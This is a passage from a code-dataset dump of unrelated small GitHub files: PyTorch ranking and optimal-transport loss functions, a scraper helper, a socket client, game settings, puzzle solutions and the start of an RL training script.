related_name='questions'\n )\n answer = models.ForeignKey(\n MultipleChoiceQuestionOption,\n on_delete=models.CASCADE,\n related_name='answers'\n )","repo_name":"ebinabo/metamorphosis","sub_path":"quiz/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"11395022371","text":"# coding=utf-8\r\n\r\nimport requests\r\nfrom retrying import retry\r\n\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"}\r\n\r\n# 尝试3次请求\r\n@retry(stop_max_attempt_number=10)\r\ndef _parse_url(url, method, data, proxies):\r\n '''解析url'''\r\n print('*'*30)\r\n\r\n if method == 'POST':\r\n response = requests.post(url, headers=headers, data=data, proxies=proxies,verify=False)\r\n else:\r\n response = requests.get(url, headers=headers, timeout=3, proxies=proxies, verify=False)\r\n\r\n assert response.status_code == 200\r\n\r\n return response.content.decode()\r\n\r\n\r\ndef parse_url(url, method='GET',data=None, proxies={}):\r\n try:\r\n html_str = _parse_url(url, method, data, proxies)\r\n\r\n except:\r\n html_str = None\r\n\r\n return html_str\r\n\r\n\r\nif __name__ == '__main__':\r\n url = 'https://www.baidu.com'\r\n print(parse_url(url))","repo_name":"giant-xf/myspider","sub_path":"7.0-爬虫(spider)/7.01-通用爬虫模块使用/parse_url.py","file_name":"parse_url.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33589615188","text":"import torch.nn as nn\nimport torch as th\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\nimport ot\n\nclass PartialOrderLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.margin1 = margin\n self.margin2 = margin2\n self.caption_count = caption_count\n self.p = p\n \n \n def forward(self, dist, labels):\n # print('------------------------------------------------------')\n # print('margins', self.margin1, self.margin2)\n # print('dist shape', dist.shape, dist)\n # print(labels)\n zeros_helper = torch.zeros(dist.shape).cuda()\n scores=dist.cuda()\n #print('substracted score shape', scores[:,0].view(scores.size(0),1).shape)\n scores = scores-scores[:,0].view(scores.size(0),1).expand_as(scores)\n #print('scores shape', scores.shape, scores)\n part = torch.where(labels==0, (-self.p-scores).clamp(min=0) + scores.clamp(min=0), zeros_helper).clamp(min=0)\n part1 = torch.where((labels==1) | (labels==2), (self.margin1+scores).clamp(min=0) + (-scores-self.margin2).clamp(min=0), zeros_helper).clamp(min=0)\n part2 = torch.where(labels==3, (self.margin2+scores), zeros_helper).clamp(min=0)\n #print('part1, part2',part1.shape, part2.shape, part1, part2)\n scores = dist[:,self.caption_count:].cuda()\n diagonal = scores.diag().view(scores.size(0), 1)\n d = diagonal.t().expand_as(scores)\n scores = scores - d\n #print('scores shape', scores.shape, scores)\n part3 = (self.margin2+scores).clamp(min=0)\n #print('part3 shape', part3.shape, part3)\n mask = torch.eye(scores.size(0)).cuda() > 0.5\n part3 = part3.masked_fill_(mask,0)\n #print('part3 shape', part3.shape, part3)\n Loss = part1.mean()+part2.mean()+part.mean()+part3.mean()\n return Loss\n \nclass OTPartialOrderLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=21, gamma=1.0, p= 0.02):\n super().__init__()\n self.margin1 = margin\n self.margin2 = margin2\n self.caption_count = caption_count\n self.p = p\n self.gamma = gamma\n #def compute_loss(self, scores):\n \n \n def forward(self, dist, labels):\n zeros_helper = torch.zeros(dist.shape).cuda()\n scores=dist.cuda()\n scores = scores-scores[:,0].view(scores.size(0),1).expand_as(scores)\n groundMetric0 = torch.nn.functional.relu(-self.p - scores)+torch.nn.functional.relu(scores)\n groundMetric1 = torch.nn.functional.relu(self.margin1 + scores)\n groundMetric2 = torch.nn.functional.relu(-self.margin2 - scores)\n groundMetric3 = torch.nn.functional.relu(self.margin2 + scores)\n GM0 = (labels==0).cuda().float().mul(groundMetric0)\n GM1 = ((labels==1) | (labels==2)).cuda().float().mul(groundMetric1)\n GM2 = (((labels==1) | (labels==2))).cuda().float().mul(groundMetric2)# why not 1 or 2 result better without not \n GM3 = (labels==3).cuda().float().mul(groundMetric3)\n GM=GM0+GM1+GM2+GM3\n # GM=(~(labels==0)).cuda().float().mul(GM)#why prune label zero losss\n expGM = torch.exp(-self.gamma * GM)\n GMFlatten = expGM.view(-1)\n\n uuu = np.ones([dist.size(0)]) / dist.size(0)\n vvv = np.ones([dist.size(1)]) / dist.size(1)\n reg = (-1) / 5\n expGM_numpy = expGM.cpu().detach().numpy()\n \n T = torch.from_numpy(ot.sinkhorn(uuu, vvv, expGM_numpy, reg, numItermax=50)).cuda().float()\n # T = (~(labels==0)).cuda().float().mul(T) why remove label 0\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum\n T_Flatten = torch.autograd.Variable(T.view(-1)).float().cuda()\n\n loss1 = GM.view(-1).mul(T_Flatten).mean()\n \n\n scores = dist[:,self.caption_count:].cuda()\n diagonal = scores.diag().view(scores.size(0), 1)\n d = diagonal.t().expand_as(scores)\n scores = scores - d\n \n \n \n \n target_train = torch.eye(scores.size(0)).cuda()\n \n hinge_groundMetric = torch.nn.functional.relu(self.margin2 + scores)\n Pos_groundMetric = torch.nn.functional.relu(-0.5-scores)\n GM_PositivePair = target_train.mul(Pos_groundMetric)\n\n GM_NegativePair = (1 - target_train).mul(hinge_groundMetric)\n GM = GM_PositivePair + GM_NegativePair\n GM = GM.masked_fill_(target_train>0.5,0)\n GMF = GM.view(-1)\n \n expGM = torch.exp(-self.gamma * GM)\n\n GMFlatten = expGM.view(-1)\n\n uuu = np.ones([scores.size(0)]) / scores.size(0)\n vvv = np.ones([scores.size(1)]) / scores.size(1)\n reg = (-1) / 5\n expGM_numpy = expGM.cpu().detach().numpy()\n # print('I am busy at computing sinkhorn')\n # sys.stdout.flush()\n \n scores = target_train.mul((-0.5-scores).clamp(min=0)) + (1-target_train).mul((self.margin2+scores).clamp(min=0))\n T = torch.from_numpy(ot.sinkhorn(uuu, vvv, expGM_numpy, reg, numItermax=50)).cuda()\n T = T.masked_fill_(target_train>0.5, 0)\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum \n T_Flatten = torch.autograd.Variable(T.view(-1)).float().cuda()\n loss2 = scores.view(-1).mul(T_Flatten).mean()\n \n Loss = loss1+loss2\n return Loss\n \n \n\n\nclass OptimalTransportLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.margin = margin\n self.caption_count = caption_count\n self.gamma = gamma\n def optimal_transport(self, dist,labels):\n dist=dist.cuda()\n # print(dist.size(0))\n # print(dist.size(1))\n if dist.size(0) < dist.size(1):\n captions_per_video = int(dist.size(1)/dist.size(0))\n diagonal_mask = torch.eye(dist.size(0)).repeat(1,captions_per_video).cuda()\n reweight_mask = diagonal_mask.clone()\n reweight_mask[:,:dist.size(0)]=1\n else:\n captions_per_video = int(dist.size(0)/dist.size(1))\n diagonal_mask = torch.eye(dist.size(1)).repeat(captions_per_video,1).cuda()\n\n diagonal = diagonal_mask*dist\n diagonal.masked_fill_(diagonal_mask < 0.5, -1e28)\n max_diagonal, max_inds = diagonal.max(dim=1)\n d1 = max_diagonal.view(-1,1).expand_as(dist)\n\n\n target_train = diagonal_mask\n maxelement_mask = torch.zeros(dist.size()).cuda()\n maxelement_mask[torch.arange(dist.size(0)),max_inds] = 1\n bsz = dist.size(0)\n\n #target = torch.from_numpy(np.arange(0,bsz)).float().cuda()\n #target = target.view(target.size(0), 1)\n #target_train = (target == torch.transpose(target, 0, 1)).float().cuda()\n\n\n hinge_groundMetric = torch.nn.functional.relu(self.margin + dist - d1)\n Pos_groundMetric = torch.nn.functional.relu(-0.5-dist+d1)\n GM_PositivePair = target_train.mul(Pos_groundMetric)\n\n GM_NegativePair = (1 - target_train).mul(hinge_groundMetric)\n GM = GM_PositivePair + GM_NegativePair\n GM = GM.masked_fill_(target_train>0.5,0)\n GMF = GM.view(-1)\n \n expGM = torch.exp(-self.gamma * GM)\n\n GMFlatten = expGM.view(-1)\n\n uuu = np.ones([dist.size(0)]) / dist.size(0)\n vvv = np.ones([dist.size(1)]) / dist.size(1)\n reg = (-1) / 5\n expGM_numpy = expGM.cpu().detach().numpy()\n # print('I am busy at computing sinkhorn')\n # sys.stdout.flush()\n \n dist = target_train.mul((-0.5-dist+d1).clamp(min=0)) + (1-target_train).mul((self.margin+dist-d1).clamp(min=0))\n T = torch.from_numpy(ot.sinkhorn(uuu, vvv, expGM_numpy, reg, numItermax=50)).cuda()\n T = T.masked_fill_(maxelement_mask>0.5, 0)\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum\n if dist.size(0) < dist.size(1):\n T = T.masked_fill_(reweight_mask<0.5, 0)\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum#dist = dist.masked_fill_(I, 0)\n T_Flatten = torch.autograd.Variable(T.view(-1)).float().cuda()\n \n loss = torch.sum(dist.view(-1).mul(T_Flatten))\n\n return loss\n def forward(self, dist, labels):\n dist=dist[:,self.caption_count:]\n return self.optimal_transport(dist,labels)+self.optimal_transport(dist.t(),labels)\n\n\nclass MaxMarginRankingLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.fix_norm = fix_norm\n self.loss = th.nn.MarginRankingLoss(margin)\n self.margin = margin\n self.caption_count = caption_count\n def forward(self, x, labels):\n x = x[:,self.caption_count:]\n #print(x.shape)\n #exit()\n n = x.size()[0]\n\n x1 = th.diag(x)\n x1 = x1.unsqueeze(1)\n x1 = x1.expand(n, n)\n x1 = x1.contiguous().view(-1, 1)\n x1 = th.cat((x1, x1), 0)\n\n x2 = x.contiguous().view(-1, 1)\n x3 = x.transpose(0, 1).contiguous().view(-1, 1)\n x2 = th.cat((x2, x3), 0)\n max_margin = F.relu(self.margin - (x1 - x2))\n\n if self.fix_norm:\n # remove the elements from the diagonal\n keep = th.ones(x.shape) - th.eye(x.shape[0]) # 128 x 128\n keep1 = keep.view(-1, 1)\n keep2 = keep.transpose(0, 1).contiguous().view(-1, 1)\n keep_idx = th.nonzero(th.cat((keep1, keep2), 0).flatten()).flatten()\n if x1.is_cuda:\n keep_idx = keep_idx.cuda()\n x1_ = th.index_select(x1, dim=0, index=keep_idx)\n x2_ = th.index_select(x2, dim=0, index=keep_idx)\n max_margin = F.relu(self.margin - (x1_ - x2_))\n\n return max_margin.mean()\n\nclass DistanceWeightedLoss(nn.Module):\n\n def __init__(self,margin=0.09,margin2=0.09,fix_norm=True, caption_count=21, gamma=1.0, p= 0.02):\n super().__init__()\n self.margin = 0.09\n self.nonzero_loss_cutoff = self.margin\n self.cutoff = -0.03\n self.caption_count = caption_count\n\n def forward(self, x, labels):\n gt = -x[:,0]+1\n x = x[:,self.caption_count:]\n n = x.size()[0]\n d = x.size()[1]\n\n zeros_helper = torch.zeros(x.shape).cuda()\n ones_helper = torch.ones(x.shape).cuda()\n scores = -x.cuda()+1\n distance = scores.cuda()\n scores_temp = torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) < self.cutoff, zeros_helper+1e-10, distance)\n log_weights = ((2.0 - float(d)) * torch.log(scores_temp) - (float(d - 3) / 2) * torch.log(1.0 - 0.25 * (scores_temp ** 2.0)))\n weights = torch.exp(log_weights - torch.max(log_weights))\n mask = (1-torch.eye(n)).cuda()\n weights = weights * mask * torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) > self.nonzero_loss_cutoff, ones_helper, zeros_helper+1e-10)\n weights = weights / (torch.sum(weights, dim=1, keepdim=True)+1e-10)\n loss = torch.ones(n).cuda()\n np_weights = weights.cpu().detach().numpy()\n for i in range(n):\n try:\n idx = np.random.choice(n, 5, p=np_weights[i]).tolist()\n for j in idx:\n loss[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n except:\n idx = np.random.choice(n, 5).tolist()\n for j in idx:\n loss[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n \n distance = scores.t().cuda()\n scores_temp = torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) < self.cutoff, zeros_helper+1e-10, distance)\n log_weights = ((2.0 - float(d)) * torch.log(scores_temp) - (float(d - 3) / 2) * torch.log(1.0 - 0.25 * (scores_temp ** 2.0)))\n weights = torch.exp(log_weights - torch.max(log_weights))\n mask = (1-torch.eye(n)).cuda()\n weights = weights * mask * torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) > self.nonzero_loss_cutoff, ones_helper, zeros_helper+1e-10)\n weights = weights / (torch.sum(weights, dim=1, keepdim=True)+1e-10)\n loss1 = torch.ones(n).cuda()\n np_weights = weights.cpu().detach().numpy()\n for i in range(n):\n try:\n idx = np.random.choice(n, 10, p=np_weights[i]).tolist()\n for j in idx:\n loss1[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n except:\n idx = np.random.choice(n, 10).tolist()\n for j in idx:\n loss1[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n \n return loss.mean()+loss1.mean()\n\n\nclass QuadrupletLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.margin1 = margin\n self.margin2 = margin2\n self.caption_count = caption_count\n \n \n def forward(self, dist, labels):\n zeros_helper = torch.zeros(dist.shape).cuda()\n scores=dist.cuda()\n # for p+ and p-\n # Dap-\n temp = torch.max(torch.where((labels==1) or (labels==2), scores, zeros_helper)) - scores[:,0]\n # Dap+\n score_temp = scores[:, 0] = 2\n temp1 = torch.min(torch.where((labels==0), score_temp[:, :self.caption_count], zeros_helper[:, :self.caption_count]))\n temp2 = torch.where(temp1==0, 1, temp1) - scores[:,0]\n loss1 = (self.margin2-self.margin1+temp2-temp)/(temp2+self.margin2-self.margin1)\n loss1 = loss1.clamp(min=0)\n \n # for p- and n\n # Dan\n temp3 = torch.max(torch.where((labels==3), scores, zeros_helper)) - scores[:,0] \n # Dap-\n temp4 = torch.min(torch.where((labels==1) or (labels==2), scores, zeros_helper))\n temp5 = torch.where(temp4==0, 1, temp4) - scores[:,0]\n loss2 = (self.margin1+temp5-temp3)/(temp5+self.margin1)\n loss2 = loss2.clamp(min=0)\n\n return loss1.mean()+loss2.mean()\n\n\nclass BCEWithLogitsLoss(nn.Module):\n\n def __init__(self, weight=None):\n super().__init__()\n self.loss = th.nn.BCEWithLogitsLoss(weight=weight)\n\n def forward(self, x, target):\n return self.loss(x, target)\n\n\nclass CrossEntropyLoss(nn.Module):\n\n def __init__(self, weight=None):\n super().__init__()\n self.loss = th.nn.CrossEntropyLoss(weight=weight)\n\n def forward(self, x, target):\n return self.loss(x, target.long().to(x.device))\n\n\nif __name__ == \"__main__\":\n loss = BCEWithLogitsLoss()\n x = th.randn(3, requires_grad=True)\n target = th.empty(3).random_(2)\n output = loss(x, target)\n output.backward()\n print(target)\n","repo_name":"nshubham655/RUDDER","sub_path":"codebase/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":14976,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"1638607573","text":"TITLE = \"JumpCat!\"\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\nFONT_NAME = 'arial'\nHS_FILE = \"highscore.txt\"\n\n# Аудио файлы\nSTART_SCREEN_MUSIC = \"start.ogg\"\nBACKGROUND_MUSIC = \"background.ogg\"\nGAME_OVER_MUSIC = \"game_over.wav\"\n\n# Параметры игрока\nPLAYER_ACC = 0.5\nPLAYER_FRICTION = -0.12\nPLAYER_GRAV = 0.8\nPLAYER_JUMP = 24\n\n# Параметры игры\nBOOST_POWER = 60\nACCELERATOR_SPAWN_CHANGE = 5\nENEMIES_SPAWN_TIME = 5000\n\n# Стартовые платформы\nPLATFORM_LIST = [(0, HEIGHT - 40),\n (WIDTH / 2 - 50, HEIGHT * 3 / 4),\n (125, HEIGHT - 350),\n (350, 200),\n (175, 100)]\n\n# Цвета\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nLIGHTBLUE = (0, 175, 255)\nBGCOLOR = LIGHTBLUE","repo_name":"Goddo-ro/Jumpets","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"72787711318","text":"#Test5.1.py\nimport random\n\ndef genpwd(length):\n val = random.randint(10**(length-1),10**length-1)\n return val\n\nlength = eval(input())\nrandom.seed(17)\nfor i in range(3):\n print(genpwd(length))\n","repo_name":"ZYM1111/Pycharm_Python","sub_path":"Test5.1.py","file_name":"Test5.1.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20711105856","text":"#!/usr/bin/python\n\n\nimport logging\n\nlogger = logging.getLogger()\n\nhan = logging.FileHandler('log1.log')\n\nformat = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\nhan.setFormatter(format)\n\nlogger.addHandler(han)\n\nlogmessage = \"Testing message in python\"\n\nlogger.error(logmessage)\n\n","repo_name":"scriptedinstalls/Scripts","sub_path":"python/logs/log1.py","file_name":"log1.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8889650521","text":"from string import ascii_lowercase\nimport heapq\n\nroutes = open('input').read().split('\\n')\ngrid = [list(route) for route in routes]\nlength = len(grid)\nheight = len(grid[0])\nvisited = [[False]*height for i in range(length)] # all coordinates in grid must be False, for visited nodes durther down\n\ndef check_allowed_climb_height(letter):\n if letter == \"S\":\n return 0 # elevatiion of a\n elif letter == \"E\":\n return 25 # elevation of z\n elif letter in ascii_lowercase:\n return ascii_lowercase.index(letter)\n else:\n return None # this shouldn't happen\n\ndef check_neighbours(pos_x, pos_y):\n directions = [[1,0], [0,1], [-1,0], [0,-1]] # can either go one step to left, right, up or down from current pos_x, pos_y\n for dir in directions:\n x, y = dir[0], dir[1]\n\n neighbour_x = x + pos_x\n neighbour_y = y + pos_y\n\n if not(length > neighbour_x >= 0 and height > neighbour_y >= 0): # outside of grid to right-most, left-most, upper or furthest down part of the grid\n continue # is outside with current coordinates, just continue to avoid indexing problems\n if check_allowed_climb_height(grid[neighbour_x][neighbour_y]) - check_allowed_climb_height(grid[pos_x][pos_y]) >= -1: # check if index of ascii_lowercase is at most one higher than current elevation\n yield neighbour_x, neighbour_y # to check all four directions\n\nfor i in range(length):\n for j in range(height):\n if grid[i][j] == \"S\": # start\n start = i,j\n if grid[i][j] == \"E\": # end\n end = i,j\n\n\"\"\"\nPart 2 works a bit different from Part 1. Here the easiest way to find the End point from 'a' is to\nstart from the End point E and find the closest 'a' instead of iterating through every 'a' in the grid.\nWith this said, the first element in the heap have the coordinates for the End point E. To find 'a'\nwe instead change our if-statement to return True if the height helper-function returns the ascii_lowercase\nindex of the letter 'a' which is our destination. If that is found we return the new minimum steps.\n\"\"\"\ncurr = [(0, end[0], end[1])]\nminimum_steps = 0\nwhile True:\n steps, x, y = heapq.heappop(curr)\n\n if visited[x][y] != False:\n continue\n\n if check_allowed_climb_height(grid[x][y]) == ascii_lowercase.index('a'): # iteration done through Dijkstras algorithm, minimum_steps found when 'a' is found\n minimum_steps = steps\n break\n\n visited[x][y] = True\n\n for neighbour_x, neighbour_y in check_neighbours(x, y): # returns all possible neighbours and adds them to heap, picks the smallest further up\n heapq.heappush(curr, (steps + 1, neighbour_x, neighbour_y))\n\nprint(minimum_steps)\n","repo_name":"Stronkness/Advent-Of-Code","sub_path":"2022/12/day12_2.py","file_name":"day12_2.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7077327652","text":"class Solution:\n\tdef find(self,Input,rule,turn):\n\t\tM1=Input\n\t\trule=[1 if rule[i]=='alive' else 0 for i in range(len(rule))]\n\t\tfor i in range(turn):\n\t\t\tM1=self.Calculate_live(Input)\n\t\t\tM2=self.Calculate_new(M1,rule)\n\n\t\t\tInput=M2\n\t\treturn Input\n\n\n\tdef Calculate_live(self,Input):\n\t\tN=[[0,0,0,0],[0,0,0,0]]\n\t\tN[0][0]=Input[0][1]+Input[1][0]+Input[1][1]\n\t\tN[0][1]=Input[0][0]+Input[1][1]+Input[1][0]+Input[0][2]+Input[1][2]\n\t\tN[0][2]=Input[0][3]+Input[0][1]+Input[1][1]+Input[1][2]+Input[1][3]\n\t\tN[0][3]=Input[0][2]+Input[1][2]+Input[1][3]\n\t\tN[1][0]=Input[0][0]+Input[0][1]+Input[1][1]\n\t\tN[1][1]=Input[0][0]+Input[0][1]+Input[1][0]+Input[0][2]+Input[1][2]\n\t\tN[1][2]=Input[0][3]+Input[0][1]+Input[1][1]+Input[0][2]+Input[1][3]\n\t\tN[1][3]=Input[0][2]+Input[1][2]+Input[0][3]\n\t\treturn N\n\n\tdef Calculate_new(self,M1,rule):\n\t\t#print(M1)\n\t\tfor i in range(2):\n\t\t\tfor j in range(4):\n\t\t\t\t#print(i,j)\n\t\t\t\tM1[i][j]=rule[M1[i][j]]\n\t\treturn M1\n\n\n\ns= Solution()\nprint(s.find([[0, 1, 1, 0], [1, 1, 0, 0]],[\"dead\", \"dead\", \"dead\", \"alive\", \"dead\", \"alive\", \"dead\", \"dead\", \"dead\"],2))\n\n\n","repo_name":"Sarthak67/leisure_coding","sub_path":"gird.py","file_name":"gird.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25043463672","text":"\r\n#f_read = open(\"resdata.txt\",'r');\r\n#f_write = open(\"data3.txt\",'w');\r\n#\r\n# i=0\r\n# res = ''\r\n#\r\n# for i in range (0, 8010):\r\n# \tf_read = open(\"resdata.txt\", 'r');\r\n# \tk = i\r\n# \twhile k != 0:\r\n# \t\ttemp = f_read.readline()[:-3]\r\n# \t\tk -= 1\r\n#\r\n# \tfor j in range(0, 29):\r\n# \t\tres += f_read.readline()[:-1]\r\n# \tres += f_read.readline()[:-2]\r\n# \tf_write.write(res+'\\n')\r\n# \tres = ''\r\n# \tf_read.close();\r\n# f_write.close();\r\n\r\n# File Writer\r\n\r\nimport collections\r\n\r\nbuffers = collections.deque([])\r\nlabel = collections.deque([])\r\n\r\nf_read = open(\"data.txt\", 'r');\r\nf = open(\"data5.txt\", 'w')\r\n\r\nwhile(True) :\r\n data = \"\"\r\n data = f_read.readline()[:]\r\n print(data)\r\n #if(data[-3]==6):\r\n\t# continue\r\n\r\n data_f = data.split(\"/\")\r\n #print(data_f[3])\r\n label_ = int(data_f[3])\r\n if(len(buffers) < 90) :\r\n #buffers.append(data_f[:3])\r\n label.append(label_)\r\n for i in range(3):\r\n buffers.append(str(data_f[i]))\r\n else :\r\n send_data = \"\"\r\n avg_label = 0\r\n for i in range(90):\r\n send_data += (str(buffers[i]) + \" \")\r\n if(i%3==0):\r\n avg_label += label[int(i/3)]\r\n\r\n avg_label = round(avg_label / 30)\r\n buffers.popleft()\r\n buffers.popleft()\r\n buffers.popleft()\r\n # buffers.append(str(data_f[:3]))\r\n for i in range(3):\r\n buffers.append(str(data_f[i]))\r\n label.popleft()\r\n label.append(label_)\r\n send_data += str(avg_label)\r\n f.write(send_data + \"\\n\")\r\nf_read.close()\r\nf.close()\r\n","repo_name":"GMPACE/TORCS","sub_path":"src/predictor/reshape.py","file_name":"reshape.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"13936469814","text":"\"\"\"\nCreated on Fri Apr 9 2021\n\n@author: Juan Cervino\n\"\"\"\n\nimport numpy as np\n\nclass GFT:\n def __init__(self,S):\n self.S=S\n [self.eigs,self.V]=np.linalg.eig(S)\n self.V=self.V[:,np.argsort(self.eigs)]\n self.eigs=np.sort(self.eigs)\n self.Lambda=np.diag(self.eigs)\n\n def computeGFT(self,x,k=None):\n xt=np.conj(self.V.T) @ x\n if k==None:\n return xt\n else:\n xtk = np.zeros_like(xt)\n xtk[np.argsort(np.abs(xt[:, 0]))[-k:], 0] = xt[np.argsort(np.abs(xt[:, 0]))[-k:], 0]\n return xtk\n\n def computeiGFT(self,xt, k=None):\n if k==None:\n return self.V@xt\n else:\n return self.V[:,np.argsort(np.abs(xt[:,0]))[-k:]]@xt[np.argsort(np.abs(xt[:,0]))[-k:],0]\n\n def computeTotalVariation(self,x):\n #x.T转置\n return x.T@(self.S)@x\n","repo_name":"litong1103/xiaobai","sub_path":"graph_fourier_transform.py","file_name":"graph_fourier_transform.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74626244116","text":"\"\"\"\nWe are given two sentences A and B. (A sentence is a string of space separated words. Each word consists only of lowercase letters.)\n\nA word is uncommon if it appears exactly once in one of the sentences, and does not appear in the other sentence.\n\nReturn a list of all uncommon words.\n\nYou may return the list in any order.\n\n\n\nExample 1:\n\nInput: A = \"this apple is sweet\", B = \"this apple is sour\"\nOutput: [\"sweet\",\"sour\"]\nExample 2:\n\nInput: A = \"apple apple\", B = \"banana\"\nOutput: [\"banana\"]\n\n\nNote:\n\n0 <= A.length <= 200\n0 <= B.length <= 200\nA and B both contain only spaces and lowercase letters.\n\"\"\"\n\nfrom collections import Counter\n\n\nclass Solution:\n def uncommonFromSentences(self, A, B):\n \"\"\"\n :type A: str\n :type B: str\n :rtype: List[str]\n \"\"\"\n\n \"\"\"\n Method 1:\n\n * Find the words that occur only once in both the lists\n * Convert those unique words into a set and find the\n difference between the sets, both ways A-B & B-A\n * Combine the results\n\n 53 / 53 test cases passed.\n Status: Accepted\n Runtime: 36 ms\n \"\"\"\n\n set_A = set()\n set_B = set()\n\n # #Find the words that occur only once in both the lists\n counter_A = Counter(A.split())\n counter_B = Counter(B.split())\n\n # #Convert those unique words into a sets\n for k, v in counter_A.items():\n if v == 1 and k not in counter_B.keys():\n set_A.add(k)\n\n for k, v in counter_B.items():\n if v == 1 and k not in counter_A.keys():\n set_B.add(k)\n\n # #Combine the sets to form the result\n return list(set_A - set_B) + list(set_B - set_A)","repo_name":"KartikKannapur/Algorithms","sub_path":"00_Code/01_LeetCode/888_UncommonWordsfromTwoSentences.py","file_name":"888_UncommonWordsfromTwoSentences.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"8679284617","text":"# client.py\n\nimport socket # Import socket module\n\n\nserver_connection = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 12345 # Reserve a port for your service.\nbuffer_size_in_bits = 1024\n\nprint(\"Conectando-se ao servidor\")\nserver_connection.connect((host, port))\nprint(\"Conectado\")\n\nwhile True:\n message = input(\"Digite uma mensagem: \") + \"\\n\"\n server_connection.sendall(message.encode())\n if message == \"SAIR\\n\":\n break\n\n \n print(f\"Mensagem enviada\")\n print(\"Esperando resposta\")\n message_in_bytes = server_connection.recv(buffer_size_in_bits)\n if not message_in_bytes:\n break\n \n message_string = message_in_bytes.decode().split(\"\\n\")[0]\n\n print(f\"Resposta recebida :{message_string}\")\n\nserver_connection.close()\nprint(\"Desconectando.\")\n","repo_name":"samuel-cavalcanti/ping_pong_sistemas_distruibuidos_ufu","sub_path":"ping_pong/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"73545661399","text":"import os\nimport logging\n\nimport numpy as np\n\nimport gym\nfrom matplotlib import pyplot as plt\nfrom stable_baselines3 import A2C, PPO, DDPG, SAC\nfrom stable_baselines3.common import base_class\nfrom stable_baselines3.common.noise import NormalActionNoise\n\nfrom gym_dockauv.utils.datastorage import EpisodeDataStorage, FullDataStorage\nfrom gym_dockauv.config.DRL_hyperparams import PPO_HYPER_PARAMS_DEFAULT\nfrom gym_dockauv.config.env_config import PREDICT_CONFIG, MANUAL_CONFIG, TRAIN_CONFIG, REGISTRATION_DICT\nfrom gym_dockauv.envs.docking3d import BaseDocking3d\n\n# Set logger\nlogger = logging.getLogger(__name__)\n\n\ndef train(gym_env: str,\n total_timesteps: int,\n MODEL: base_class = PPO,\n model_save_path: str = \"logs/PPO_docking\",\n agent_hyper_params: dict = PPO_HYPER_PARAMS_DEFAULT,\n env_config: dict = TRAIN_CONFIG,\n tb_log_name: str = \"PPO\",\n timesteps_per_save: int = None,\n model_load_path: str = None) -> None:\n f\"\"\"\n Function to train and save model, own wrapper\n \n Model name that will be saved is \"[model_save_path]_[elapsed_timesteps]\", when timesteps_per_save is given model \n is captured and saved in between \n \n .. note:: Interval of saving and number of total runtime might be inaccurate, if the StableBaseLine agent n_steps \n is not accordingly updated, for example total runtime is 3000 steps, however, update per n_steps of the agent is \n by default for PPO at 2048, thus the agents only checks if its own simulation time steps is bigger than 3000 \n after every multiple of 2048 \n\n :param MODEL: DRL algorithm model to use\n :param gym_env: Registration string of gym from docking3d\n :param total_timesteps: total timesteps for this training run\n :param model_save_path: path where to save the model\n :param agent_hyper_params: agent hyper parameter, default is always 